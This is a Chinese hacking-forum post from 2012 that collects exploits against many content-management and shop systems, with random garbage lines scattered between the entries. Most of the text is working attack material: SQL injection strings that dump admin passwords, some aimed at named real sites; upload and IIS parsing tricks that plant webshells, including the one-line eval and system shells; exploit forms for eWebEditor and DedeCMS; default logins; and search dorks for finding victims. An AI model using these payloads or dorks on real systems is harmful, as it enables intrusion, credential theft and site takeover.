中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
$ j1 N* l" y4 F8 ^
9 g0 W/ j$ r1 r* C7 z' d
直接上exploit:
' Q+ Q0 U& i) S4 `
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
/ C4 I* r8 i8 R( _
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
( n N9 o) k0 E o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# X0 B1 O6 S0 p" h- r9 R+ |
Asprain论坛 注册用户 上传图片就可拿到webshell
# x6 e3 \/ i, B/ k% r) @
. x# v) y8 J9 Z
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
- {8 z( O$ W: e' Y: a9 I! {; T
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
0 t; X4 z" t2 b3 x
2.gif 为一小图片文件,一定要小,比如qq表情图片
, }+ K4 \8 B4 y6 y0 ^# A, s. V
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
5 k" ~. {0 A2 I: N* ]
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
% H }5 T4 |" V, q
5.q.asp;.gif
2 n. G7 F8 M4 |. o4 K
google:Powered by Asprain
( F2 Y2 T; \3 T1 F/ D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 Y! U; C% D! ~) w
% u/ N; S- s& u6 P4 \3 |. I; N
ShopNum1全部系统存在上传漏洞。
* ? e) B. Y! h. o
6 u* i2 N1 \# m
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
, d0 Z. K* _, J, [
按说明 提示登录后台。。
8 h' G. b8 G8 _! c. V% x
在后台功能页面->附件管理->附件列表
4 E4 O( q3 X4 O. ^
可以直接上传.aspx 后缀木马
" B A* K( s% c8 {" C; Z. ^
http://demo.shopnum1.com/upload/20110720083822500.aspx
( I5 ?/ U6 v8 N! G) I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
e; l5 A, x, R, o; Z% d
. `7 i) v' V8 m. d# s* A$ {
牛牛CMS中小企业网站管理系统 上传漏洞
2 O9 \$ r- P0 v! l8 A
) ~7 E- K- N) O3 x! w4 T& m
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% n) t8 t% Q9 F* U7 f" c& K, g; ^
后台:admin/login.asp
4 L4 t) _" P, y1 G9 S1 q+ M* G
ewebeditor 5.5 Nday
/ i6 M! k! Y, p' d, V! a+ v8 r
exp:
/ l) s% i# a3 K
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
3 e# |9 Y/ t* f3 ^- d
<input?type=file?name=uploadfile?size=100><br><br>?
1 H- g1 G# C; \' v2 f1 @9 ^
<input?type=submit?value=upload>?
/ U. M! S/ f$ m. _
</form>
8 n" p( E7 M3 h& Y
ps:先上传小马.
% R# [) X( y( o7 C* Y5 S
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
8 H8 _/ Y8 j. }. {
# c; ~$ F3 }1 @( ?7 a) }9 t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% G x0 X7 d+ p6 n; @: l& W8 o4 I) Y
: n3 f, ?& ]2 x+ A
YothCMS 遍历目录漏洞
( y9 @) q, Y' x/ t3 A
) `7 Y" }" x, z, l* _
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
2 b; M7 o1 Z! D& i# r2 K {
默认后台:admin/login.asp
4 R, x8 t' Z, M1 W( d) i; J
遍历目录:
, l3 Y3 z8 F1 @) q( ?6 D) H
ewebeditor/manage/upload.asp?id=1&dir=../
7 f6 @, P' w, g3 I1 ]
data:
6 e' i/ w9 E% }2 l5 U" F7 ]
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
' H8 g0 F; g2 w! _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" ~) u' m5 D, v! n$ m. p @1 ?
% }* F( w& L i6 R. Q! k6 w7 A
Net112企业建站系统 1.0
9 K$ C& x5 C; y# O5 @0 V
4 D8 u, e; l$ t5 ^% S, y
源码简介:
5 l' y( U! x5 H2 B0 P
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
# }5 \+ s7 Q2 p
添加管理员:
) Z# }$ \7 h+ @" q1 @' B: l
http://www.0855.tv/admin/admin.asp?action=add&level=2
4 V& c: y$ ]) N. [$ R& ~
其实加不加都不是很重要,后台文件都没怎么作验证。
* W% Y7 n7 R6 {1 b% w) f' f4 H+ R' U
上传路径:
: `) S! [/ y2 S" D
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
2 {4 e, G2 [) x. A6 }# w
http://www.0855.tv/inc/Upfile.asp?Stype=2
8 O% @# j# w7 @
怎么利用自己研究。
; x& z6 E+ H) s
遍历目录:
; g+ P5 V) l6 ^
http://www.0855.tv/admin/upfile.asp?path=../..
- h, e' R) }& d D# `+ r
如:
4 o1 k- E! [; Q1 x. x
http://www.0855.tv/admin/upfile.asp?path=../admin
" o) ]' M' O) E x' y+ B& E: I
http://www.0855.tv/admin/upfile.asp?path=../data
9 u' y$ z8 \- s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; s$ o( K3 t' p/ D& @: p1 B
# m" j4 g$ ?) f$ A1 Y7 U7 J, E
易和阳光购物商城通杀 上传漏洞
8 t1 i+ F( X; @5 P4 B# f5 `( F% b3 G
5 }/ |& ~5 P* ~4 B" a- K' b
前提要求是IIS6.0+asp坏境。
% t: `+ D# y5 ^; }: l2 p& F' ?" D
漏洞文件Iheeo_upfile.asp
& l" `6 k2 e) y/ H( Q
过滤不严.直接可以iis6.0上传
- [) N$ w9 X( c
把ASP木马改成0855.asp;1.gif
; U' Q! Q8 D; G E
直接放到明小子上传
& h) o- @& n* {+ }4 N7 s9 ~. M
Google搜索:inurl:product.asp?Iheeoid=
) ~1 Z! g( T/ j4 Y$ D$ k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ j5 S2 w# e8 F, p0 r+ f
$ K1 a: a# j W( f8 q
phpmyadmin后台4种拿shell方法
8 c" V2 e& F% q+ e
9 c+ s6 Q; Y; Y$ l- F: B3 F
方法一:
k+ y6 ]4 O! d: X
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
- x1 O: [0 A* L. ~ R6 h* y( {# I
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 A7 i/ h* c' Z3 E+ ?7 {: L. {
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
% {& N5 i# r d/ z; \1 G
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 e7 I S' k1 @4 E3 ~8 u: d
一句话连接密码:xiaoma
0 D: _2 O+ g3 @/ N
方法二:
) e6 g& Y8 t' J6 P& W
Create TABLE xiaoma (xiaoma1 text NOT NULL);
1 O& m( ]) b& O. _) m4 Z
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
I; C7 M2 b# a, v
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
2 c Z1 ~; {0 ^! O
Drop TABLE IF EXISTS xiaoma;
: ^3 O2 v* f0 X. t& g
方法三:
! _( J' _# w4 Y8 \1 ^
读取文件内容: select load_file('E:/xamp/www/s.php');
% |8 g1 v7 q$ o2 w
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- ~1 A% D8 [$ C% a8 k F7 ]
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% n# Y& ?* c1 c+ J
方法四:
1 K% ?1 h/ q# U5 j- [
select load_file('E:/xamp/www/xiaoma.php');
$ v# A& P2 x5 q- h
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 x# Z* o" }0 q" f: `
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
$ m% U/ {" w/ U. A* c! R3 ~3 P
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ G- t1 y" {# E: l3 ^
4 j- t4 I+ e' P2 l9 Z
传信网络独立开发网站源码0day漏洞
9 ]! t9 m9 _) Z/ u
7 S, n; x( ^/ w5 t$ F
后台system/login.asp
& r( Z; ^4 B2 e. e* G$ u
进了后台有个ewebeditor
! |; r7 H' k* ^8 j$ C
Google 搜索inurl:product1.asp?tyc=
6 h8 h! ?% w: R. B
编辑器漏洞默认后台ubbcode/admin_login.asp
! k4 ~2 e1 U/ \8 A7 B7 z
数据库ubbcode/db/ewebeditor.mdb
/ @1 t6 S: k/ R4 N
默认账号密码yzm 111111
1 k3 B: |7 U: N- M
7 G4 }5 T- N. z+ ^; d% s9 v* U0 i: X
拿webshell方法
- R% U! i! L* }/ ~ Q( H* q
登陆后台点击“样式管理”-选择新增样式
7 p6 u% ?" ?7 A* ` h1 V% a4 l
样式名称:scriptkiddies 随便写
4 |5 y7 q3 o. K) `" }! r- W
路径模式:选择绝对路径
- {( J5 r" q# W% N6 p
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
/ l- b8 k# }6 P: y X
图片类型比如就是我们要上传的ASP木马格式
6 E/ `+ u: T4 E2 e) A. l
上传路径:/
! I/ {1 ^$ `! C. \1 `" w3 y
图片限制:写上1000 免的上不了我们的asp木马
0 j- B1 R: D# h; {1 d
上传内容不要写
$ i# }% z5 p% K9 H$ W
可以提交了
) ]. y2 T/ F0 J5 i9 p8 g2 I) ^
样式增加成功!
/ a& a- A- P9 \4 j" w/ b& I- Z
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
3 J: g; J7 ?3 J: F% ~' H
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
+ K7 m/ |$ P+ h, E7 K
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
8 {: l, k7 D2 l
上ASP木马 回车 等到路径
7 v' s3 [- y0 I5 |: F/ ?9 [
) l5 ]; l( {* I3 P2 ^+ ^
后台:system/login.asp
: X5 j: z: Y$ p
Exp:
+ c' t. o0 |* O' Z
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
3 N- f9 W" f) W2 o% r
测试:
6 q5 b% A5 U- A- w( T
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: `* O) g9 q7 d4 k9 [( [/ U9 T
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
/ I# u* V/ u9 p6 i7 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ^: i; ]) ]" a& h/ a
* [ r }4 Y- A, A- u2 L
foosun 0day 最新注入漏洞
; d+ u% |1 U! I
5 E$ T9 W/ a( D6 X
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
& j) z3 J+ ?5 `' H0 Q8 o* a/ o
利用简单的方法:
& X0 a D j1 g4 j, s
暴管理员帐号:
7 L" i7 w2 H! A) H
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
' m: E( l! u5 x1 l
暴管理员密码:
1 \' D! p2 Z* S: b! X0 q
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
+ n" P. _! Z0 x9 l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 }0 ]* _( Z# I$ k
3 Q8 U, E# K6 R
网站程序的版权未知!
2 B$ r& }! @8 M5 ?& H7 ^# |* H
7 m& F! L# V/ j; O
默认网站数据库:
A1 _# n8 V+ K% u. U
www.i0day.com/data/nxnews.mdb
% W, H# x6 a/ C! w
ewebeditor 在线编辑器:
C1 U8 T+ a: @. A4 g" x" s
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
. m' U+ j1 |; r8 P( {/ A3 r& l
登录地址:ewebeditor/admin_login.asp
) _2 v* Y6 E0 s' p+ Z1 s
默认密码:admin admin
2 F! c" `0 `7 ]: D$ N3 ^8 X# x0 N: |
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
' @5 c. L2 g$ T' V* c' D4 U% n
6 z; g; `) x( K; n8 a! Q! o- |
Sql注入漏洞:
+ t; A( P0 a0 \+ j0 J* j
http://www.i0day.com/detail.asp?id=12
. y/ m' t/ F5 c8 Z H3 O
exp:
6 g& G+ W/ J5 q- e, M; ?% ]( ^
union select 1,admin,password,4,5,6,7,8 from admin
* b" I* ^/ t( K6 b
爆出明文帐号/密码
. n, H" K' l, t7 a' Z
0 d! i% W# a4 s/ s& h4 Z: i5 v6 |
上传漏洞:
& `+ y1 \" n9 @& @$ F. {. J3 q
后台+upfile.asp
6 g9 ^. G. {3 \9 E+ ?. M5 o
如:
c7 J" e6 U5 C/ s; ]4 @0 M; G9 [: C
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
Q3 n6 C2 b0 t+ g! q4 d
shell的地址:网址+后台+成功上传的马
0 ~ Y( ?( K5 E% e4 z& m+ Y3 f
google:inurl:news.asp?lanmuName=
# E4 {1 v: p* O) h' C' j
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( a8 v1 ?& k6 h' k
8 l/ b/ T r3 i9 P4 t1 B! D1 p
dedecms最新0day利用不进后台直接拿WEBSHELL
2 t1 t# G) ~+ ?$ y1 `
' \- F' @% w* v5 e# B' l
拿webshell的方法如下:
' n) \9 k! S+ p4 Q/ J% O/ N# s6 C
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
: F' b1 q ^% f$ Z
前题条件,必须准备好自己的dede数据库,然后插入数据:
1 S% f8 l' ]) O% v
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
9 ~5 S$ x' U4 H% I1 y+ U p
) P; Q5 Q7 K# ? x0 x J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 q& n0 g% N3 p4 f2 {5 `
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
0 y# s3 K/ I6 `+ e# K
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
- E, B; b6 Q: b* ~. m f. \; G% x3 i
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
v, A- l$ }+ x% `, R+ w
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, {. I7 f) a+ i% ^5 O9 \1 S! T
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
# F! b/ l9 t! E* \) T
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; V! z; D0 r) y% P
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; X% `" ]; ^. m4 T3 ~) x7 Y1 T3 k
<input type="text" value="true" name="nocache" style="width:400">
! v, ~1 N0 k* G+ w& `6 @5 z F/ D
<input type="submit" value="提交" name="QuickSearchBtn"><br />
* b& u O" @1 t8 s
</form>
w9 Y4 S( P% P
<script>
4 w- f: F/ w- Y9 W5 F" g
function addaction()
% F' H1 Q# e$ T1 z6 W
{
) n) a# m& v& P' a% O, A: ?% j, \6 S
document.QuickSearch.action=document.QuickSearch.doaction.value;
/ i& N# n/ S, {
}
/ T: ]0 G h; s# b6 X
</script>
4 }; f! A; j% K' R4 g# b3 M
-----------------------------------------------------------------------------------------------------------------------------------------------
, X( q G& s( W7 |
9 C/ s8 F0 Y: j* \ m
dedecms织梦暴最新严重0day漏洞
- ]! J) k3 P$ b K% N
bug被利用步骤如下:
9 h! R' Q! Q1 G' L/ Y* |3 o6 G
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 {5 w8 i8 p9 k! Q
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 C7 D, J. r* F$ M* g; {, N
-------------------------------------------------------------------------------------------------------------------------------------------
$ c/ D, M# N0 K# N
9 @8 U! C* }0 Y8 E) N* o5 E( B, u
多多淘宝客程序上传漏洞
p2 h+ z/ u; N: ]) f5 A0 [. n- d
漏洞页面:
q! h% Y# s% t( u9 s1 k
admin\upload_pic.php
' F' E, N3 h( ~
传送门:
1 V9 P$ c0 K# T; v: l: z* O
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
& Y: N; U) i! H( n5 U8 L( P
PS:copy张图片马 直接 xxx.php 上传抓包地址!
& o6 W, Z* J5 Q7 i5 D ^5 Y9 b
------------------------------------------------------------------------------------------------------------------------------------------------------
# [+ z8 `" F* o I+ J
. l3 y% L: G6 P% X+ w) U
无忧公司系统ASP专业版后台上传漏洞
1 F; b. n: F. ~
漏洞文件 后台上传
' H+ O. c/ I+ k5 Q
admin/uploadPic.asp
0 |6 d" J( J8 z) D% V& r9 U
漏洞利用 这个漏洞好像是雷池的
$ {. Q0 K5 F3 o9 t. R$ K4 N
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
7 U" K/ M& R" c6 \
等到的webshell路径:
- H; G4 Y. v3 F& [$ ~2 N
/UploadFiles/scriptkiddies.asp;_2.gif
! r+ p; m1 S! C% X1 Z* j: y7 y8 N
---------------------------------------------------------------------------------------------------------------------------------------------------
9 j' L4 v; R1 {8 s9 g4 ?& j5 y
0 u& P! G0 f+ G' |* T! Y. V
住哪酒店分销联盟系统2010
$ k0 Z$ {& G8 r2 P' T6 V
Search:
4 g9 C6 y: x1 y& P
inurl:index.php?m=hotelinfo
4 l U6 ^" {9 l; I: j. h- r* \
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
2 B; \( t; v/ M& L; o/ N3 R
默认后台:index.php?m=admin/login
" Q# ]* H$ C+ `$ h7 K
--------------------------------------------------------------------------------------------------------------------------------------------------
& |; J1 R0 D* D( |6 A. I- g
, E; L) A0 n6 B# g0 S3 f
inurl:info_Print.asp?ArticleID=
! N0 c# N3 @ e# G
后台 ad_login.asp
) y7 p% I% T' ]& R* ]
爆管理员密码:
' s$ @: Q, q7 |) N4 c$ J O
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
) e- b) L4 b4 B t
------------------------------------------------------------------------------------------------------------------------------------------------------------
# U# X% B. c3 S; C
$ b* p- Y* o/ C2 ~, \& V/ d
搜索框漏洞!
( c' c6 G4 v. U8 \0 @* _
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
1 s# S, D( e# T6 C8 I
--------------------------------------------------------------------------------------------------------------------------------------------------------
+ q A [& {! H. K
! t+ X2 ?& S) b( H8 n
关键字:
) A4 ^5 ?( I) u* V& U8 b
inurl:/reg_TemletSel.asp?step=2
" O) B% ~* Y& X# b3 S& Z1 D5 t
或者
5 h# T( H$ E5 Q7 d/ Z2 T/ x; \
电子商务自助建站--您理想的助手
/ \9 g: o& D* v6 J3 }5 ?' V
-------------------------------------------------------------------------------------------------------------------------------------------------
) b0 j, t+ l: E+ x4 S t& D
Y& B1 A8 p) E* U) J: ~; a/ k; [
iGiveTest 2.1.0注入漏洞
7 j0 V( m; L+ N2 q* J; I
Version: <= 2.1.0
% @9 w2 D6 X8 N7 L' E9 j9 A
# Homepage:
http://iGiveTest.com/
) \1 Y4 h( `9 A n( m: }
谷歌关键字: “Powered by iGiveTest”
& ~3 w" Q" q! u+ u/ U( F# q8 U$ W% A
随便注册一个帐号。然后暴管理员帐号和密码
+ d& L7 n8 f n" f) Y3 R: E
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
4 F7 d2 a3 i. s
------------------------------------------------------------------------------------------------------------------------------------------------
2 p5 e( B" g9 v% W/ x. r
6 Q+ L( a: j% k5 ]# W' e
CKXP网上书店注入漏洞
* i4 W1 f% s! r, B" }
工具加表:shop_admin 加字段:admin
1 F4 ~) \; s& i, Q$ B/ K
后台:admin/login.asp
7 \) R5 j3 O2 U d7 d$ A
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
2 S# `$ x, \" R, ^$ n( s
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ p# v$ g" v% h8 w7 ]9 \# g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 d1 r) @5 S8 I' [
0 N( u0 k) V) }) U6 q0 _
段富超个人网站系统留言本写马漏洞
5 u7 G' N' n2 l* ?2 Z* X
源码下载:
http://www.mycodes.net/24/2149.htm
5 ]/ Y; o. ?" l' R
addgbook.asp 提交一句话。
) z; n; g# V. i! Z5 k- {
连接:
http://www.xxxx.tv/date/date3f.asp
9 u) Z0 S4 r; F# W4 |1 n
google:为防批量,特略!
' W1 e3 c& W* _ j
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" [' [* l" f* k* ]2 [5 m0 C
2 R' A9 l+ m! P# Q
智有道专业旅游系统v1.0 注入及列目录漏洞
2 s. o8 B0 b8 [ A( E" ?
默认后台路径:/admin/login.asp
( I6 K1 G* N% ]% s/ b- n
默认管理员:admin
2 u- W( ?4 M' Z: y5 y R P2 G$ P
默认密码:123456
& q( c, L( T' q: r' j1 S! Q6 e
SQL EXP Tset:
! p0 Z) X) i8 m/ {, f* f' k
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
, g* K" O: [# {0 X% e. ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 O2 @5 N7 o6 |* K1 ^/ o
" s, ]! n) O+ P" R2 v+ M
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
3 q0 d' L% t, T
EXP:
/ K$ q- A% J9 |% N, T
<title>eWebeditoR3.8 for php任意文件上EXP</title>
8 B# c& t( O8 l( a% Q" ^
<form action="" method=post enctype="multip
t+ X7 k% H% @* C7 a
art/form-data">
2 C( Q: r1 }+ I. y7 Y8 [
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
P& ?! x% _* L8 A
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
% k8 @/ @/ F, J
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
9 k3 w. ^6 Q& k( k2 O
file:<input type=file name="uploadfile"><br>
: n+ {' i- s6 d9 X2 ]/ S$ a$ S
<input type=button value=submit onclick=fsubmit()>
) X7 \, T* c/ }+ Y+ o
</form><br>
4 `, c6 G# ?5 m# d# y* O
<script>
! k- U, n5 }2 y0 U
function fsubmit(){
& S$ n7 d4 c1 @' V2 V
form = document.forms[0];
- k9 x- o3 p& w) H P5 T# _+ Q
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
% ~6 m" ]& j. H2 @; P
alert(form.action);
& e4 l+ \" F: l2 }- t9 q, ?3 i
form.submit();
: i, ~! I" H' J8 E1 b- y* @, v
}
b: r# o& d) M+ y/ m
</script>
* s3 G7 p O4 c2 w
注意修改里面ewebeditor的名称还有路径。
% p, D1 _& a& _ o) H
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ {4 c* o4 Y/ S3 V' j' J
2 v) V% R8 B& D) F3 H+ v7 I) Z; p% R
提交’时提示ip被记录 防注入系统的利用
9 u' A9 L* f$ _' u6 ^& U; d& \: I7 m
网址:
http://www.xxx.com/newslist.asp?id=122
′
4 F3 N% W9 @2 C8 t1 e! ~6 V0 E
提示“你的操作已被记录!”等信息。
, o- a. c6 V8 u. t# S( ]3 Q X
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
3 b$ K0 |( t1 @& r/ r
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: J- T9 ~' z) m9 }
# X) U1 X# n# r
西部商务网站管理系统 批量拿shell-0day
7 L$ ^+ `+ `' R
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
* a2 Z: j" Q, D) b2 @3 z/ e
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
( s2 v% K6 y2 b: `' v% D7 m- O" k
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
4 O+ k- S9 w2 Q8 Q3 i: p4 B
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
3 M8 M, s5 O4 U( O0 R2 O
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# i5 e+ ~/ d/ Z& _8 A) T
# X9 x+ Y1 E/ P; ^* O! s& L! f" x
JspRun!6.0 论坛管理后台注入漏洞
: K" K+ @: n, @6 L6 k, e
- W m" Q. f- r8 t! y2 D
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
9 V: Q' ?/ O: Q7 ?. |7 C
JspRun!6.0
7 t7 ?& t" |0 ~. ]; r, |$ H6 n
漏洞描述:
+ j/ c2 h0 i! k- J1 Y
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
) K* S% t" h' L! S2 U; ]* M- z
在处理后台提交的文件中ForumManageAction.java第1940行
2 j) ^# O/ Z! a1 P% P ^
String export = request.getParameter("export");//直接获取,没有安全过滤
# S# Q9 ?% }5 `- d1 L; x8 q. ], U+ M
if(export!=null){
$ X# R9 [) _& C
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
1 d7 S* D4 b' B0 S
if(styles==null||styles.size()==0){
: y' E1 c, K" h. [1 ^0 x* y( R1 D7 |
<*参考
& D% [3 n" ?# Z4 e
nuanfan@gmail.com
" }- f$ O! Y' P8 |0 l% V
*> SEBUG安全建议:
+ l5 s/ V) b4 n) C
www.jsprun.net
. w+ [# U( C7 R6 E+ V/ W, i* A
(1)安全过滤变量export
' L# y8 o2 {4 ?
(2)在查询语句中使用占位符
, |4 D- M/ P$ H# \3 R
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 C' j) v Y" o; ^
+ }1 t9 o# q3 n) [* U
乌邦图企业网站系统 cookies 注入
6 G' J! Q: b8 [& S- k( T t
! J( R, H' H r! T) b2 T, T
程序完整登陆后台:/admin/login.asp
6 \, J. P* h8 ~0 e, W2 C N
默认登陆帐号:admin 密码:admin888
, ]8 M; x7 _$ H2 [ h2 u
语句:(前面加个空格)
+ A2 f# f+ D, k# P" I
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
; B; W1 L5 \6 y$ s1 m) `8 ]4 M
或者是16个字段:
1 p1 h% x$ j1 {1 L! j; _
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
: T; m% t" C2 O9 y4 f
爆不出来自己猜字段。
/ a" x! K P3 K) e
注入点:
http://www.untnt.com/shownews.asp?=88
3 w+ a: ?5 ^8 Z8 j( V
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
% q4 p- p( X5 p" } r
关键字:
9 W6 K7 d" W- r2 m
inurl:shownews?asp.id=
P: z2 N$ s6 U+ `: W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 l. g5 e# A! S/ ~& @$ i8 x
" |+ G$ x4 v0 k. m. \+ x
CKXP网上书店注入漏洞
# O$ @+ u5 y+ p# F. B. n
8 H9 j. y2 l1 u
工具加表:shop_admin 加字段:admin
2 D2 \& `; N, H2 ^2 L0 e! `2 C
后台:admin/login.asp
' ^2 r" X, U, \1 k8 g% r1 B6 T
